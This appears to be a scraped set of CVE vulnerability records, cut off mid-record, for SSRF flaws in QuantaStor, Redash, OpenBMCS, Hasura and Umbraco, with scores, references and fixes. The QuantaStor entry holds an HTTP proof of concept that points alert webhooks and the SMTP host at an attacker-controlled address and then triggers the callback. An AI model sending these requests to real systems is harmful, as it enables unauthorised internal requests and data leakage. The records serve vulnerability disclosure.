\u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u0026nbsp;6 16-02-55 2021\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003 }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u0026nbsp; \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u0026nbsp;\n\u003cbr\u003e\u2003\u2003\u2003\u2003\u2003},\u003cbr\u003e\u2003\u2003\u2003\u2003],\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"footer_icon\": \"\u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://platform.slack-edge.com/img/default_application_icon.png\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003e\",\n\u003cbr\u003e\u2003\u2003\u2003\u2003\"ts\": 1628461774\u003cbr\u003e\u2003\u2003\u2003}\u003cbr\u003e\u2003\u2003], \u003cbr\u003e\u2003\u2003\"mrkdwn\":true \u003cbr\u003e\u2003}\u0027, \u003cbr\u003e\u2003#### FLASK REQUEST STUFF #####\n\u003cbr\u003e\u2003\u0027headers\u0027: {\n\u003cbr\u003e\u2003\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\u003cbr\u003e\u2003}, \u003cbr\u003e\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e"
}
],
"value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \nHTTP/1.1\n\nHost: \u003cHOSTNAME\u003e \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by \u003cTARGET\u003e looks like this:\n{\n\u2003\n### Python FLASK stuff ####\n\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \n\u2003\n\u0027method\u0027: \u0027POST\u0027, \n\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n\u0027data\u0027: b\u0027{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://\u003cHOSTNAME\u003e)\",\n \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003 }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}\u0027, \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003\u0027headers\u0027: {\n\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \n\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\n\u2003}, \n\u2003\u0027args\u0027: ImmutableMultiDict([]), \n\u2003\u0027form\u0027: ImmutableMultiDict([]), \n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\n}\n\n#### END FLASK REQUEST STUFF #####"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:03.059Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"exploit",
"technical-description"
],
"url": "https://cisrt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-42079"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42079",
"datePublished": "2023-07-10T06:29:48.339Z",
"dateReserved": "2021-10-07T17:12:57.677Z",
"dateUpdated": "2025-09-22T06:40:03.059Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-43780 (GCVE-0-2021-43780)
Vulnerability from cvelistv5 – Published: 2021-11-23 23:55 – Updated: 2024-08-04 04:03
VLAI
Title
Server-Side Request Forgery (SSRF) in Redash
Summary
Redash is a package for data visualization and sharing. In versions 10.0 and priorm the implementation of URL-loading data sources like JSON, CSV, or Excel is vulnerable to advanced methods of Server Side Request Forgery (SSRF). These vulnerabilities are only exploitable on installations where a URL-loading data source is enabled. As of time of publication, the `master` and `release/10.x.x` branches address this by applying the Advocate library for making http requests instead of the requests library directly. Users should upgrade to version 10.0.1 to receive this patch. There are a few workarounds for mitigating the vulnerability without upgrading. One can disable the vulnerable data sources entirely, by adding the following env variable to one's configuration, making them unavailable inside the webapp. One can switch any data source of certain types (viewable in the GitHub Security Advisory) to be `View Only` for all groups on the Settings > Groups > Data Sources screen. For users unable to update an admin may modify Redash's configuration through environment variables to mitigate this issue. Depending on the version of Redash, an admin may also need to run a CLI command to re-encrypt some fields in the database. The `master` and `release/10.x.x` branches as of time of publication have removed the default value for `REDASH_COOKIE_SECRET`. All future releases will also require this to be set explicitly. For existing installations, one will need to ensure that explicit values are set for the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY `variables.
Severity
6.8 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/getredash/redash/security/advi… | x_refsource_CONFIRM |
| https://github.com/getredash/redash/commit/61bbb5… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T04:03:08.620Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/getredash/redash/security/advisories/GHSA-fcpv-hgq6-87h7"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/getredash/redash/commit/61bbb5aa7a23a93f2f93710005f71bc972826099"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "redash",
"vendor": "getredash",
"versions": [
{
"status": "affected",
"version": "\u003c= 10.0.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Redash is a package for data visualization and sharing. In versions 10.0 and priorm the implementation of URL-loading data sources like JSON, CSV, or Excel is vulnerable to advanced methods of Server Side Request Forgery (SSRF). These vulnerabilities are only exploitable on installations where a URL-loading data source is enabled. As of time of publication, the `master` and `release/10.x.x` branches address this by applying the Advocate library for making http requests instead of the requests library directly. Users should upgrade to version 10.0.1 to receive this patch. There are a few workarounds for mitigating the vulnerability without upgrading. One can disable the vulnerable data sources entirely, by adding the following env variable to one\u0027s configuration, making them unavailable inside the webapp. One can switch any data source of certain types (viewable in the GitHub Security Advisory) to be `View Only` for all groups on the Settings \u003e Groups \u003e Data Sources screen. For users unable to update an admin may modify Redash\u0027s configuration through environment variables to mitigate this issue. Depending on the version of Redash, an admin may also need to run a CLI command to re-encrypt some fields in the database. The `master` and `release/10.x.x` branches as of time of publication have removed the default value for `REDASH_COOKIE_SECRET`. All future releases will also require this to be set explicitly. For existing installations, one will need to ensure that explicit values are set for the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY `variables."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-23T23:55:09.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/getredash/redash/security/advisories/GHSA-fcpv-hgq6-87h7"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/getredash/redash/commit/61bbb5aa7a23a93f2f93710005f71bc972826099"
}
],
"source": {
"advisory": "GHSA-fcpv-hgq6-87h7",
"discovery": "UNKNOWN"
},
"title": "Server-Side Request Forgery (SSRF) in Redash",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-43780",
"STATE": "PUBLIC",
"TITLE": "Server-Side Request Forgery (SSRF) in Redash"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "redash",
"version": {
"version_data": [
{
"version_value": "\u003c= 10.0.0"
}
]
}
}
]
},
"vendor_name": "getredash"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Redash is a package for data visualization and sharing. In versions 10.0 and priorm the implementation of URL-loading data sources like JSON, CSV, or Excel is vulnerable to advanced methods of Server Side Request Forgery (SSRF). These vulnerabilities are only exploitable on installations where a URL-loading data source is enabled. As of time of publication, the `master` and `release/10.x.x` branches address this by applying the Advocate library for making http requests instead of the requests library directly. Users should upgrade to version 10.0.1 to receive this patch. There are a few workarounds for mitigating the vulnerability without upgrading. One can disable the vulnerable data sources entirely, by adding the following env variable to one\u0027s configuration, making them unavailable inside the webapp. One can switch any data source of certain types (viewable in the GitHub Security Advisory) to be `View Only` for all groups on the Settings \u003e Groups \u003e Data Sources screen. For users unable to update an admin may modify Redash\u0027s configuration through environment variables to mitigate this issue. Depending on the version of Redash, an admin may also need to run a CLI command to re-encrypt some fields in the database. The `master` and `release/10.x.x` branches as of time of publication have removed the default value for `REDASH_COOKIE_SECRET`. All future releases will also require this to be set explicitly. For existing installations, one will need to ensure that explicit values are set for the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY `variables."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918: Server-Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/getredash/redash/security/advisories/GHSA-fcpv-hgq6-87h7",
"refsource": "CONFIRM",
"url": "https://github.com/getredash/redash/security/advisories/GHSA-fcpv-hgq6-87h7"
},
{
"name": "https://github.com/getredash/redash/commit/61bbb5aa7a23a93f2f93710005f71bc972826099",
"refsource": "MISC",
"url": "https://github.com/getredash/redash/commit/61bbb5aa7a23a93f2f93710005f71bc972826099"
}
]
},
"source": {
"advisory": "GHSA-fcpv-hgq6-87h7",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-43780",
"datePublished": "2021-11-23T23:55:10.000Z",
"dateReserved": "2021-11-16T00:00:00.000Z",
"dateUpdated": "2024-08-04T04:03:08.620Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-47703 (GCVE-0-2021-47703)
Vulnerability from cvelistv5 – Published: 2025-12-09 20:36 – Updated: 2026-04-07 14:05
VLAI
Title
OpenBMCS Server Side Request Forgery (SSRF) via /php/query.php
Summary
OpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the 'ip' parameter to force the application to make an HTTP request to an arbitrary destination host.
Severity
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/50670 | exploit |
| https://www.openbmcs.com | product |
| https://www.zeroscience.mk/en/vulnerabilities/ZSL… | third-party-advisory |
| https://www.vulncheck.com/advisories/openbmcs-ser… | third-party-advisory |
Date Public
2022-01-18 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47703",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-09T21:32:51.414136Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-09T21:33:01.529Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenBMCS",
"vendor": "OPEN BMCS",
"versions": [
{
"status": "affected",
"version": "2.4"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "LiquidWorm as Gjoko Krstic of Zero Science Lab"
}
],
"datePublic": "2022-01-18T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eOpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the \u0027ip\u0027 parameter to force the application to make an HTTP request to an arbitrary destination host.\u003c/p\u003e"
}
],
"value": "OpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the \u0027ip\u0027 parameter to force the application to make an HTTP request to an arbitrary destination host."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:05:31.524Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-50670",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/50670"
},
{
"name": "Official Product Homepage",
"tags": [
"product"
],
"url": "https://www.openbmcs.com"
},
{
"name": "Zero Science Lab Disclosure (ZSL-2022-5694)",
"tags": [
"third-party-advisory"
],
"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php"
},
{
"name": "VulnCheck Advisory: OpenBMCS Server Side Request Forgery (SSRF) via /php/query.php",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/openbmcs-server-side-request-forgery-ssrf-via-phpqueryphp"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "OpenBMCS Server Side Request Forgery (SSRF) via /php/query.php",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47703",
"datePublished": "2025-12-09T20:36:20.265Z",
"dateReserved": "2025-12-05T19:10:29.045Z",
"dateUpdated": "2026-04-07T14:05:31.524Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47715 (GCVE-0-2021-47715)
Vulnerability from cvelistv5 – Published: 2025-12-22 21:35 – Updated: 2026-05-24 01:37
VLAI
Title
Hasura GraphQL 1.3.3 Server-Side Request Forgery via Remote Schema Injection
Summary
Hasura GraphQL 1.3.3 contains a server-side request forgery vulnerability that allows attackers to inject arbitrary remote schema URLs through the add_remote_schema endpoint. Attackers can exploit the vulnerability by sending crafted POST requests to the /v1/query endpoint with malicious URL definitions to potentially access internal network resources.
Severity
5.3 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/49791 | exploit |
| https://github.com/hasura/graphql-engine | product |
| https://www.vulncheck.com/advisories/hasura-graph… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Hasura | Hasura GraphQL |
Affected:
1.3.3
|
Date Public
2021-04-19 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47715",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-22T22:00:43.179939Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-22T22:05:54.146Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Hasura GraphQL",
"vendor": "Hasura",
"versions": [
{
"status": "affected",
"version": "1.3.3"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Dolev Farhi"
}
],
"datePublic": "2021-04-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Hasura GraphQL 1.3.3 contains a server-side request forgery vulnerability that allows attackers to inject arbitrary remote schema URLs through the add_remote_schema endpoint. Attackers can exploit the vulnerability by sending crafted POST requests to the /v1/query endpoint with malicious URL definitions to potentially access internal network resources."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-24T01:37:00.339Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-49791",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/49791"
},
{
"name": "Hasura GraphQL Engine GitHub Repository",
"tags": [
"product"
],
"url": "https://github.com/hasura/graphql-engine"
},
{
"name": "VulnCheck Advisory: Hasura GraphQL 1.3.3 Server-Side Request Forgery via Remote Schema Injection",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/hasura-graphql-server-side-request-forgery-via-remote-schema-injection"
}
],
"title": "Hasura GraphQL 1.3.3 Server-Side Request Forgery via Remote Schema Injection",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47715",
"datePublished": "2025-12-22T21:35:25.534Z",
"dateReserved": "2025-12-05T19:10:29.047Z",
"dateUpdated": "2026-05-24T01:37:00.339Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47776 (GCVE-0-2021-47776)
Vulnerability from cvelistv5 – Published: 2026-01-15 15:52 – Updated: 2026-04-07 14:06
VLAI
Title
Umbraco v8.14.1 - 'baseUrl' SSRF
Summary
Umbraco CMS v8.14.1 contains a server-side request forgery vulnerability that allows attackers to manipulate baseUrl parameters in multiple dashboard and help controller endpoints. Attackers can craft malicious requests to the GetContextHelpForPage, GetRemoteDashboardContent, and GetRemoteDashboardCss endpoints to trigger unauthorized server-side requests to external hosts.
Severity
5.3 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/50462 | exploit |
| https://our.umbraco.com/ | product |
| https://releases.umbraco.com/all-releases | product |
Date Public
2021-10-29 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47776",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
